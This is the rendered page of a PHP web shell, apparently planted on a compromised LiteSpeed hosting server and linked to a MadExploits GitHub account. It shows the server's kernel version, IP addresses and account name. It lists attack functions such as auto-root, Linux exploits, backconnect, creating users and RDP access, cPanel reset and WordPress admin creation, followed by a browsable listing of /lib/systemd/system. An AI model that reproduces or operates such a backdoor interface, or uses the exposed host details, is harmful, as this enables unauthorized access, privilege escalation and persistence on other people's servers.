•  Linux serv4.rebootns.com 5.14.0-570.60.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Nov 5 05:00:59 EST 2025 x86_64
  •  LiteSpeed
  •  : 139.99.122.128 | : 216.73.216.53
  •  Cant Read [ /etc/named.conf ]
  •  7.3.33
  •  gploilcompany
  •  www.github.com/MadExploits
  •  
  • Terminal
  • AUTO ROOT
  • Adminer
  • Backdoor Destroyer
  • Linux Exploit
  • Lock Shell
  • Lock File
  • Create User
  • CREATE RDP
  • PHP Mailer
  • BACKCONNECT
  • UNLOCK SHELL
  • HASH IDENTIFIER
  • CPANEL RESET
  • CREATE WP USER
  •  README
  • + Create Folder
  • + Create File
  / lib / systemd / system / [ HOME SHELL ] 
Name Size Permission Action
  -.slice.d [ DIR ] drwxr-xr-x  
  basic.target.wants [ DIR ] drwxr-xr-x  
  dbus.target.wants [ DIR ] drwxr-xr-x  
  default.target.wants [ DIR ] drwxr-xr-x  
  graphical.target.wants [ DIR ] drwxr-xr-x  
  initrd-root-device.target.want... [ DIR ] drwxr-xr-x  
  initrd-root-fs.target.wants [ DIR ] drwxr-xr-x  
  initrd.target.wants [ DIR ] drwxr-xr-x  
  mariadb@bootstrap.service.d [ DIR ] drwxr-xr-x  
  multi-user.target.wants [ DIR ] drwxr-xr-x  
  reboot.target.wants [ DIR ] drwxr-xr-x  
  remote-fs.target.wants [ DIR ] drwxr-xr-x  
  rescue.target.wants [ DIR ] drwxr-xr-x  
  runlevel1.target.wants [ DIR ] drwxr-xr-x  
  runlevel2.target.wants [ DIR ] drwxr-xr-x  
  runlevel3.target.wants [ DIR ] drwxr-xr-x  
  runlevel4.target.wants [ DIR ] drwxr-xr-x  
  runlevel5.target.wants [ DIR ] drwxr-xr-x  
  sockets.target.wants [ DIR ] drwxr-xr-x  
  sshd-keygen@.service.d [ DIR ] drwxr-xr-x  
  sw-engine.service.d [ DIR ] drwxr-xr-x  
  sysinit.target.wants [ DIR ] drwxr-xr-x  
  syslog.target.wants [ DIR ] drwxr-xr-x  
  system-update.target.wants [ DIR ] drwxr-xr-x  
  systemd-hostnamed.service.d [ DIR ] drwxr-xr-x  
  systemd-logind.service.d [ DIR ] drwxr-xr-x  
  systemd-udev-trigger.service.d [ DIR ] drwxr-xr-x  
  timers.target.wants [ DIR ] drwxr-xr-x  
  user-.slice.d [ DIR ] drwxr-xr-x  
  user@.service.d [ DIR ] drwxr-xr-x  
  user@0.service.d [ DIR ] drwxr-xr-x